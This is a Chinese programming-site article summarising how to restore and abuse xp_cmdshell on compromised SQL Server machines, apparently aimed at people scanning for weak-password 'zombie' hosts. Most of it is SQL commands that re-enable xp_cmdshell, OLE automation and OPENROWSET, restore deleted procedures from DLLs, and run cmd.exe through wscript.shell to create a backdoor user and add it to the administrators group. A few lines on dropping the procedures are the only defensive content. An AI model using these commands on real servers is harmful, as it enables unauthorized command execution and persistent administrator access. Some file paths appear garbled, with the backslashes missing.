位置: 编程技术 - 正文

SQL入侵恢复xp_cmdshell方法总结

编辑:rootadmin
SQL入侵恢复xp_cmdshell方法总结 sql server 下开启xp_cmdshell的办法 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; SQL开启'OPENROWSET'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; SQL开启'sp_oacreate'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 突破SA的各种困难 常见情况恢复执行xp_cmdshell 1 未能找到存储过程'master..xpcmdshell'. 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 2 无法装载 DLL xpsql.dll 或该DLL所引用的某一 DLL。原因(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc "xp_cmdshell" 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 3 无法在库 xpweb.dll 中找到函数 xp_cmdshell。原因: (找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb.dll' 然后按F5键命令执行完毕 四.终极方法. 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net localgroup administrators dell /add' xp或server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net localgroup administrators dell /add' -------------- xp_cmdshell新的恢复办法 删除 drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 恢复 dbcc addextendedproc ("sp_oacreate","odsole.dll") dbcc addextendedproc ("xp_cmdshell","xplog.dll") 这样可以直接恢复,不用去管sp_addextendedproc是不是存在 ----------------------------- 删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc 'xp_cmdshell' 恢复cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 开启cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 恢复xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 否则上传xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystemxplog.dll' 堵上cmdshell的sql语句 sp_dropextendedproc "xp_cmdshell ---------------- 删除sql危险存储: /*不狐 附上恢复扩展存储过程的办法 先恢复sp_addextendedproc,语句如下: SQL代码: 再恢复以上所有扩展存储过程 SQL代码: SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 经常扫SQL弱口令肉鸡的朋友应该遇见过这样的问题 ! 接下来我们用SQL语句搞定他 分析器执行的语句: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE

推荐整理分享SQL入侵恢复xp_cmdshell方法总结,希望有所帮助,仅作参考,欢迎阅读内容。

SQL入侵恢复xp_cmdshell方法总结

文章相关热门搜索词:,内容如对您有帮助,希望把文章链接给更多的朋友!

sqlserver 函数、存储过程、游标与事务模板 1.标量函数:结果为一个单一的值,可包含逻辑处理过程。其中不能用getdate()之类的不确定性系统函数.--标量值函数--==============================================

ADO.NET EF中的实体修改方法 1.传统修改模式,看下列代码using(NorthwindEntitiescontext=newNorthwindEntities()){Regionregion=context.Region.FirstOrDefault(v=v.RegionID==4);region.RegionDescription="Test";context.SaveCha

sqlserver 聚集索引和非聚集索引实例 createdatabasemyIndexDemogousemyIndexDemogocreatetableABC(Aintnotnull,Bchar(),Cvarchar())goinsertintoABCselect1,'B','C'unionselect5,'B','C'unionselect7,'B','C'unionselect9,'B','C'goselect*fromABC-

标签: SQL入侵恢复xp_cmdshell方法总结

本文链接地址:https://www.jiuchutong.com/biancheng/349165.html 转载请保留说明!

上一篇:世界杯猜想活动的各类榜单的SQL语句小结(世界杯猜测)

下一篇:sqlserver 函数、存储过程、游标与事务模板(sqlserver函数大全)

  • Yii2框架引用bootstrap中日期插件yii2-date-picker的方法(yii2框架结构)

    Yii2框架引用bootstrap中日期插件yii2-date-picker的方法(yii2框架结构)

  • 老生常谈ThinkPHP中的行为扩展和插件(推荐)(老生常谈造句)

    老生常谈ThinkPHP中的行为扩展和插件(推荐)(老生常谈造句)

  • MMC.exe是什么进程 MMC.exe进程常见问题介绍(main.exe是什么意思)

    MMC.exe是什么进程 MMC.exe进程常见问题介绍(main.exe是什么意思)

  • Win10拖动窗口到桌面边缘总是自动缩放该怎么关闭?(win10拖动窗口快捷键)

    Win10拖动窗口到桌面边缘总是自动缩放该怎么关闭?(win10拖动窗口快捷键)

  • android中动态添加组件(android动态添加fragment)

    android中动态添加组件(android动态添加fragment)

  • jQuery实现监控页面所有ajax请求的方法(jquery监听页面刷新)

    jQuery实现监控页面所有ajax请求的方法(jquery监听页面刷新)

  • Android UI-自定义日历控件(安卓自定义ui)

    Android UI-自定义日历控件(安卓自定义ui)

  • 增强现实追加1(增强现实的三个特征)

    增强现实追加1(增强现实的三个特征)

  • 哪些企业需要缴纳企业所得税?
  • 股东投资款给自己发工资如何处理?
  • 记账错误怎么办
  • 免抵税额什么时候缴纳城建税
  • 多计提公积金怎么办理
  • 融资租入固定资产属于资产吗
  • 融资性售后回租承租方出售资产为什么不缴纳增值税
  • 经营租赁是主营业务收入吗
  • 资本溢价是
  • 劳务发票税率营改增后是多少?
  • 附加税按实际缴纳计提吗
  • 企业搬迁补偿款发放流程
  • 退回多交的所得税怎么做分录小规模
  • 个税手续费返还会计分录
  • 公司账户境外汇款
  • 罚息 增值税
  • 环保税征收意义
  • 中央财政补贴政策
  • 质量成本包括哪两个成本
  • 残保金所属期与税款所属期
  • 公司账上没钱还假发工资违法吗
  • 公账的钱如何合法取出会计
  • mac更新系统版本
  • 以前年度少计费用,调整分录
  • PHP:session_cache_limiter()的用法_Session函数
  • 外币兑换业务的银行
  • phpdie
  • agsservice是什么进程
  • codelite怎么进行编译
  • 黄金旧料卖出收据怎么写
  • 补计提去年所得税费用会计分录
  • 显示国家税务总局东莞分局打来电话是诈骗还是正规电话
  • 个人所得税零报税怎么报
  • css垂直导航栏
  • 文件不小心删除了怎么恢复
  • 阿里通义千问官网
  • IDEA 2022专业版创建Java Web项目(保姆式小白讲义,强烈建议入手!)
  • php数组转树
  • 顺丰电子发票开票失败需要怎么处理?
  • 增值税地方留存比例2023
  • 超过五年的未弥补亏损如何处理?
  • 超简单的土法自制水泥
  • 销售折扣收货方法有哪些
  • 以前未入账固定资产补入账
  • 金蝶k3开票
  • 利润分配转作股本的股利属于什么科目
  • 财务报告与财务思维
  • 劳务费发票是个人的吗
  • 债权投资持有期间的账务处理
  • 核定征收和查账征收报税有区别吗
  • 营改增后所得税怎么计算
  • 固定资产采购需要走什么流程
  • 当月暂估入账跨月怎么算
  • 辅助核算设置后使用后还可以随时修改
  • 没收到发票怎么入账
  • 工厂宿舍水电费怎么扣
  • 什么是资产减值准备计提
  • mysql案例分析
  • 开窗函数窗口范围
  • 一个 sql 查询很慢,从哪些地方进行优化?
  • linux 编译命令
  • crack.exe是什么意思
  • centos7.5设置静态ip
  • win8系统崩溃按f8没用
  • win8怎么把c盘恢复出厂设置
  • microsoft/微软
  • 'GL_COMBINE_ARB' : undeclared 'GL_RGB_SCALE_ARB' : undeclared 问题
  • jquery滚动到底部
  • 怪物掉落物品的获取方式
  • jquery中的siblings方法
  • 如何用javascript
  • javascript 代码
  • javascript几种类型
  • 动态页面设计
  • 经营所得个人所得税税率表
  • 医保12333查询系统
  • 出租车票据国税怎么开
  • 江苏税务ukey怎么申请
  • 财税招商专员是做什么的
  • 预先支付货款
    • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设